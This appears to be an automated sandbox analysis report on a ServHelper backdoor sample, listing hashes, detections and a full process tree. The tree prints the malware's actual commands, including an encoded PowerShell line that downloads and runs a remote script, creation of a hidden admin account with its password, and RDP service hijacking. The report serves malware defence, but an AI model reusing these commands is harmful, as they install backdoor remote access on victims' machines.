Analysis
max time kernel: 167s
max time network: 188s
platform: windows7_x64
resource: win7v20210408
submitted: 22-09-2021 06:21
Static task: static1
Behavioral task: behavioral1
  Sample: 61d5e32562d1c70daf0a3112f7888258.exe
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: 61d5e32562d1c70daf0a3112f7888258.exe
  Resource: win10-en-20210920
General
Target: 61d5e32562d1c70daf0a3112f7888258.exe
Size: 5.7MB
MD5: 61d5e32562d1c70daf0a3112f7888258
SHA1: 11c54ce99e87637f58c7bc0bd8134c73df9bf879
SHA256: da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605
SHA512: 9cad97c4c71535a2391ad73d13e27748300e3147a3383d4eee85caadb461815f9ee8e9b172e732df16813fa8f5ffdc7115e2740778ebc51c536ab06fc7910cc2
Malware Config
Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- ServHelper
  ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
- suricata: ET MALWARE ServHelper CnC Inital Checkin
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (1 IoC)
  Processes (flow, pid, process): 10, 1320, powershell.exe
- Modifies RDP port number used by Windows (1 TTP)
- Possible privilege escalation attempt (8 IoCs)
  Processes (pid, process): 952 icacls.exe; 1736 icacls.exe; 624 icacls.exe; 1756 takeown.exe; 1696 icacls.exe; 1380 icacls.exe; 1368 icacls.exe; 1516 icacls.exe
- Sets DLL path for service in the registry (2 TTPs)
- Processes (resource, yara_rule): \Windows\Branding\mediasrv.png upx; \Windows\Branding\mediasvc.png upx
- Loads dropped DLL (2 IoCs)
  Processes (pid): 884; 884
- Modifies file permissions (1 TTP, 8 IoCs)
  Processes (pid, process): 1368 icacls.exe; 1516 icacls.exe; 952 icacls.exe; 1736 icacls.exe; 624 icacls.exe; 1756 takeown.exe; 1696 icacls.exe; 1380 icacls.exe
- Drops file in System32 directory (1 IoC)
  File created: C:\Windows\system32\rfxvmt.dll (powershell.exe)
- Drops file in Windows directory (21 IoCs)
  Processes (description, ioc, process):
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex (powershell.exe)
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e7fc69aa-b31d-4c73-9aee-74b52a70cad7 (powershell.exe)
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_928e1545-d3f4-42aa-8697-b0076d1abc46 (powershell.exe)
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_141a24d8-449e-4974-94ef-285a988282ab (powershell.exe)
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_229db460-2302-4054-b1b6-982bb0ef94ae (powershell.exe)
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9880927e-2494-4d24-a7f8-a6fcdff6762e (powershell.exe)
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_323d885c-4adc-4743-b9e2-dbff51c78107 (powershell.exe)
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e0d11be0-ee1c-4581-81e7-371b7150ce13 (powershell.exe)
  File created: C:\Windows\branding\mediasrv.png (powershell.exe)
  File opened for modification: C:\Windows\branding\Basebrd (powershell.exe)
  File opened for modification: C:\Windows\branding\wupsvc.jpg (powershell.exe)
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ea27df9c-bc90-40c3-8e19-c43c1104e839 (powershell.exe)
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b816317e-70d8-4475-8151-893cd53f43a2 (powershell.exe)
  File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y3LFTIR59G5681HH3G32.temp (powershell.exe)
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8b05eb37-a2d3-4e6d-94e4-69a5b87b963f (powershell.exe)
  File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_74ba2926-1d90-4656-a223-c63556293bb4 (powershell.exe)
  File created: C:\Windows\branding\mediasvc.png (powershell.exe)
  File created: C:\Windows\branding\wupsvc.jpg (powershell.exe)
  File opened for modification: C:\Windows\branding\ShellBrd (powershell.exe)
  File opened for modification: C:\Windows\branding\mediasrv.png (powershell.exe)
  File opened for modification: C:\Windows\branding\mediasvc.png (powershell.exe)
- Modifies data under HKEY_USERS (4 IoCs)
  Processes (description, ioc, process):
  Key created: \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage (powershell.exe)
  Set value (data): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00945e0d8bafd701 (powershell.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe)
  Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe)
- Modifies registry key (1 TTP, 1 IoC)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (13 IoCs)
  Processes (pid, process): 1224 powershell.exe; 1224 powershell.exe; 1552 powershell.exe; 1552 powershell.exe; 1808 powershell.exe; 1808 powershell.exe; 1716 powershell.exe; 1716 powershell.exe; 1224 powershell.exe; 1224 powershell.exe; 1224 powershell.exe; 1320 powershell.exe; 1320 powershell.exe
- Suspicious behavior: LoadsDriver (5 IoCs)
  Processes (pid): 468; 884; 884; 884; 884
- Suspicious use of AdjustPrivilegeToken (18 IoCs)
  Processes (description, pid, process):
  Token: SeDebugPrivilege 1224 powershell.exe
  Token: SeDebugPrivilege 1552 powershell.exe
  Token: SeDebugPrivilege 1808 powershell.exe
  Token: SeDebugPrivilege 1716 powershell.exe
  Token: SeRestorePrivilege 1380 icacls.exe
  Token: SeAssignPrimaryTokenPrivilege 844 WMIC.exe
  Token: SeIncreaseQuotaPrivilege 844 WMIC.exe
  Token: SeAuditPrivilege 844 WMIC.exe
  Token: SeAssignPrimaryTokenPrivilege 844 WMIC.exe
  Token: SeIncreaseQuotaPrivilege 844 WMIC.exe
  Token: SeAuditPrivilege 844 WMIC.exe
  Token: SeAssignPrimaryTokenPrivilege 1464 WMIC.exe
  Token: SeIncreaseQuotaPrivilege 1464 WMIC.exe
  Token: SeAuditPrivilege 1464 WMIC.exe
  Token: SeAssignPrimaryTokenPrivilege 1464 WMIC.exe
  Token: SeIncreaseQuotaPrivilege 1464 WMIC.exe
  Token: SeAuditPrivilege 1464 WMIC.exe
  Token: SeDebugPrivilege 1320 powershell.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source pid and process -> target pid and process, number of writes recorded):
  1840 61d5e32562d1c70daf0a3112f7888258.exe -> 1224 powershell.exe (3)
  1224 powershell.exe -> 268 csc.exe (3)
  268 csc.exe -> 760 cvtres.exe (3)
  1224 powershell.exe -> 1552 powershell.exe (3)
  1224 powershell.exe -> 1808 powershell.exe (3)
  1224 powershell.exe -> 1716 powershell.exe (3)
  1224 powershell.exe -> 1756 takeown.exe (3)
  1224 powershell.exe -> 1696 icacls.exe (3)
  1224 powershell.exe -> 1380 icacls.exe (3)
  1224 powershell.exe -> 1368 icacls.exe (3)
  1224 powershell.exe -> 1516 icacls.exe (3)
  1224 powershell.exe -> 952 icacls.exe (3)
  1224 powershell.exe -> 1736 icacls.exe (3)
  1224 powershell.exe -> 624 icacls.exe (3)
  1224 powershell.exe -> 1332 reg.exe (3)
  1224 powershell.exe -> 1820 reg.exe (3)
  1224 powershell.exe -> 1616 reg.exe (3)
  1224 powershell.exe -> 1492 net.exe (3)
  1492 net.exe -> 1844 net1.exe (3)
  1224 powershell.exe -> 1084 cmd.exe (3)
  1084 cmd.exe -> 1800 cmd.exe (3)
  1800 cmd.exe -> 1632 net.exe (1)
Processes
- C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe (PID 1840)
  Command line: "C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1224)
    Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    Signatures: Drops file in System32 directory; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 268)
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\01ximcta\01ximcta.cmdline"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 760)
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81DB.tmp" "c:\Users\Admin\AppData\Local\Temp\01ximcta\CSC1CD5A0B993214D799C33BD3EA94FE8DB.TMP"
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1552)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1808)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1716)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\takeown.exe (PID 1756)
      Command line: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe (PID 1696)
      Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe (PID 1380)
      Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
      Signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\icacls.exe (PID 1368)
      Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe (PID 1516)
      Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe (PID 952)
      Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe (PID 1736)
      Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe (PID 624)
      Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\reg.exe (PID 1332)
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - C:\Windows\system32\reg.exe (PID 1820)
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      Signatures: Modifies registry key
    - C:\Windows\system32\reg.exe (PID 1616)
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - C:\Windows\system32\net.exe (PID 1492)
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\net1.exe (PID 1844)
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - C:\Windows\system32\cmd.exe (PID 1084)
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe (PID 1800)
        Command line: cmd /c net start rdpdr
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe (PID 1632)
          Command line: net start rdpdr
          - C:\Windows\system32\net1.exe (PID 1600)
            Command line: C:\Windows\system32\net1 start rdpdr
    - C:\Windows\system32\cmd.exe (PID 1984)
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      - C:\Windows\system32\cmd.exe (PID 1080)
        Command line: cmd /c net start TermService
        - C:\Windows\system32\net.exe (PID 988)
          Command line: net start TermService
          - C:\Windows\system32\net1.exe (PID 316)
            Command line: C:\Windows\system32\net1 start TermService
    - C:\Windows\system32\cmd.exe (PID 1484)
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - C:\Windows\system32\cmd.exe (PID 1920)
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- C:\Windows\System32\cmd.exe (PID 1576)
  Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  - C:\Windows\system32\net.exe (PID 1020)
    Command line: net.exe user WgaUtilAcc 000000 /del
    - C:\Windows\system32\net1.exe (PID 1920)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
- C:\Windows\System32\cmd.exe (PID 1756)
  Command line: cmd /C net.exe user WgaUtilAcc lfOn4usP /add
  - C:\Windows\system32\net.exe (PID 1208)
    Command line: net.exe user WgaUtilAcc lfOn4usP /add
    - C:\Windows\system32\net1.exe (PID 860)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc lfOn4usP /add
- C:\Windows\System32\cmd.exe (PID 1516)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  - C:\Windows\system32\net.exe (PID 1072)
    Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    - C:\Windows\system32\net1.exe (PID 456)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe (PID 976)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
  - C:\Windows\system32\net.exe (PID 292)
    Command line: net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
    - C:\Windows\system32\net1.exe (PID 788)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
- C:\Windows\System32\cmd.exe (PID 1996)
  Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  - C:\Windows\system32\net.exe (PID 368)
    Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    - C:\Windows\system32\net1.exe (PID 1008)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe (PID 1924)
  Command line: cmd /C net.exe user WgaUtilAcc lfOn4usP
  - C:\Windows\system32\net.exe (PID 1808)
    Command line: net.exe user WgaUtilAcc lfOn4usP
    - C:\Windows\system32\net1.exe (PID 820)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc lfOn4usP
- C:\Windows\System32\cmd.exe (PID 1532)
  Command line: cmd.exe /C wmic path win32_VideoController get name
  - C:\Windows\System32\Wbem\WMIC.exe (PID 844)
    Command line: wmic path win32_VideoController get name
    Signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\cmd.exe (PID 968)
  Command line: cmd.exe /C wmic CPU get NAME
  - C:\Windows\System32\Wbem\WMIC.exe (PID 1464)
    Command line: wmic CPU get NAME
    Signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\cmd.exe (PID 1572)
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - C:\Windows\system32\cmd.exe (PID 1832)
    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1320)
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      Signatures: Blocklisted process makes network request; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads